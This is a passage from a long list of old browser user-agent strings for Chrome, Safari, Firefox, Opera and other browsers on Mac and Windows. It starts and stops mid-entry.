Chrome/5.0.375.86 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; nl-nl) AppleWebKit/532.3+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; de-at) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.343.0 Safari/533.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.0 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ru-ru) AppleWebKit/533.2+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ca-es) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; el-gr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.363.0 Safari/533.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.0 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.456.0 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-au) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/533.4+ (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/534.1+ (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ko-kr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ru-ru) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; zh-cn) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.7 Safari/533.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.414.0 Safari/534.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.210 Safari/534.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.0 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.451.0 Safari/534.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; fr-FR) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.639.0 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/533.4 (KHTML, like Gecko) Version/4.1 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.7 Safari/533.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 -Mozilla/5.0 (Macintosh; U; Mac OS X 10_5_7; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5 -Mozilla/5.0 (Macintosh; U; Mac OS X 10_6_1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-GB; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081212 Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; da-dk) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de-de) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; hu-hu) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; nl-nl) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9.2009 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1) Gecko/20060214 Camino/1.0 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.3) Gecko/20060427 Camino/1.0.1 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.4) Gecko/20060613 Camino/1.0.2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/124 (KHTML, like Gecko) Safari/125 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.51 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.8) Gecko/20051107 Camino/1.0b1 -Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312 -Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.43 Safari/534.24 -Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.706.0 Safari/534.25 -Mozilla/5.0 (Windows NT 5.1; U; ; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52 -Mozilla/5.0 (Windows NT 5.1; U; Firefox/3.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 -Mozilla/5.0 (Windows NT 5.1; U; Firefox/4.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 -Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 -Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52 -Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.50 -Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.61 -Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.22 -Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.24 -Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.26 -Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (Windows NT 5.1; U; es-la; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27 -Mozilla/5.0 (Windows NT 5.1; U; pl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00 -Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50 -Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20091102 Firefox/3.5.5 -Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53 -Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70 -Mozilla/5.0 (Windows NT 5.1; rv:2.0b8pre) Gecko/20101127 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 5.2; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27 -Mozilla/5.0 (Windows NT 5.2; U; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70 -Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24 -Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 -Mozilla/5.0 (Windows NT 6.0; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (Windows NT 6.0; U; ja; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00 -Mozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10 -Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24 -Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.694.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.697.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1; U; en-GB; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.53 Safari/534.30 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7 -Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101128 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre -Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre -Mozilla/5.0 (Windows NT 6.1; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre Firefox/4.0b6pre -Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre -Mozilla/5.0 (Windows NT) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 -Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; el-GR) -Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) -Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US)) -Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) -Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0 -Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 -Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0 -Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20020508 Netscape6/6.1 -Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.0.2) Gecko/2008092313 Firefox/3.1.6 -Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; ; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 -Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) Chrome/4.0.223.3 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0.1pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.2pre) Gecko/2008082305 Firefox/3.0.2pre -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Firefox/3.0.8) -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.8) Gecko/2009032609 Firefox/3.07 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.30) -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.648) -Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9b3) Gecko/2008020514 Opera 9.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 ( .NET CLR 3.5.30729; .NET4.0E) -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/525.13. -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13(KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.155.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.18 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.50 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.55 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.4 (KHTML, like Gecko) Chrome/0.3.155.0 Safari/528.4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Version/3.2.1 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.9 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.9 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.169.0 Safari/530.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.170.0 Safari/530.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) 